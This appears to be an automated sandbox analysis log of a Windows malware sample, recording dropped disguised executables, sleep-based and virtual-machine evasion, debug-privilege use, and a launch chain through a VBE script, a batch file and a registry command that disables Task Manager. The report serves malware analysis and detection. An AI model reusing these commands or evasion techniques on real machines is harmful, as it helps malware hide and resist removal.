Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Window / User API: threadDelayed 4030
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Window / User API: threadDelayed 5694

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\spksuybo.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oGeTRkCA.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bhUNaLwZ.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iaQciIuf.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TnEFcwnq.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PIewODkQ.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QCZpVjcx.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BpLaswaY.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NDzgjDBy.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RrReMzQm.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CXEIeahW.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sfNsKLIr.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hJqUpVHL.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FrRytwYk.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KVMxlGUc.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wwCruhPB.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iXYuZrQJ.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AEzAQzJw.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WGSwrSeE.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GTFZlGXP.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XDtENRtz.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JmTPAbOe.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SzUnVzkJ.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vwiBQQWj.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JVsHHpbK.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lZeSZrOV.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dwWdpxyo.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WmSvTfGg.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bZkuwcVU.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RTAxOVPQ.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LSnFHGjW.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SIrnFmDG.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zepZsevX.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vIyiJTTD.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fplMbujm.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jXskDIJa.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qVgkgWEP.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BjUpXdep.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KAZQIQEM.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cNoChqRS.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gVlLDILN.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RCtfAzVO.log	Jump to dropped file

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23422

Source: C:\hyperComponentFontDhcp\Mscommon.exe TID: 8048	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7624	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7544	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -599830s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -599703s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -599593s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -599417s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -599129s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -599000s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 4852	Thread sleep time: -3600000s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -598844s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -598645s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -598437s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -598172s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -598061s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -597906s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -597760s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -596953s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -596719s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -596578s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -596250s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -596109s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -595999s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -595781s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -595652s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -595539s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -595406s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -595296s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -595149s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 4852	Thread sleep time: -300000s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -595031s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -594906s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -594797s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -594640s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -594303s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -594026s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -593906s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -593762s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -593613s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -593484s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -593375s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -593265s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -593156s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -592994s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -592852s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -592734s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -592609s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -592500s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -592390s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -592281s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -592172s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -592037s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -591906s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -591795s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -591661s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -591454s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -591302s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -590659s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792	Thread sleep time: -590507s >= -30000s
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe TID: 2692	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7840	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe TID: 7912	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe TID: 6280	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7596	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe TID: 8012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 8120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe TID: 7288	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 1456	Thread sleep time: -922337203685477s >= -30000s

Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\ProgramData\SoftwareDistribution\cmd.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\ProgramData\SoftwareDistribution\cmd.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\hyperComponentFontDhcp\Mscommon.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0036A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_0036A69B
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0037C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_0037C220

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Code function: 0_2_0037E6A3 VirtualQuery,GetSystemInfo,

0_2_0037E6A3

Source: C:\hyperComponentFontDhcp\Mscommon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 30000
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599830
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599703
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599593
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599417
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599129
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 599000
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 3600000
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 598844
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 598645
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 598437
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 598172
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 598061
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 597906
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 597760
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 596953
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 596719
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 596578
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 596250
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 596109
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595999
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595781
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595652
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595539
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595406
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595296
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595149
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 300000
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 595031
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 594906
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 594797
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 594640
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 594303
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 594026
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593906
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593762
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593613
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593484
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593375
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593265
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 593156
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592994
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592852
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592734
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592609
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592500
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592390
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592281
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592172
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 592037
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 591906
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 591795
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 591661
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 591454
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 591302
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 590659
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 590507
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Thread delayed: delay time: 922337203685477

Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: wscript.exe, 00000001.00000003.1948653672.000000000345A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000001.00000003.1948653672.000000000345A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
Source: kJrNOFEGbQ.exe, 00000000.00000003.1664853002.0000000003551000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: kJrNOFEGbQ.exe, 00000000.00000003.1664853002.0000000003551000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
Source: cmd.exe, 00000021.00000002.2994327918.000000001BF79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll""

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

API call chain: ExitProcess graph end node

graph_0-23572

Source: C:\hyperComponentFontDhcp\Mscommon.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Code function: 0_2_0037F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0037F838

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Code function: 0_2_00387DEE mov eax, dword ptr fs:[00000030h]

0_2_00387DEE

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Code function: 0_2_0038C030 GetProcessHeap,

0_2_0038C030

Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process token adjusted: Debug
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process token adjusted: Debug
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process token adjusted: Debug
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0037F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0037F838
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0037F9D5 SetUnhandledExceptionFilter,	0_2_0037F9D5
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0037FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0037FBCA
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_00388EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00388EBD

Source: C:\hyperComponentFontDhcp\Mscommon.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\hyperComponentFontDhcp\Mscommon.exe "C:\hyperComponentFontDhcp/Mscommon.exe"	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"	Jump to behavior
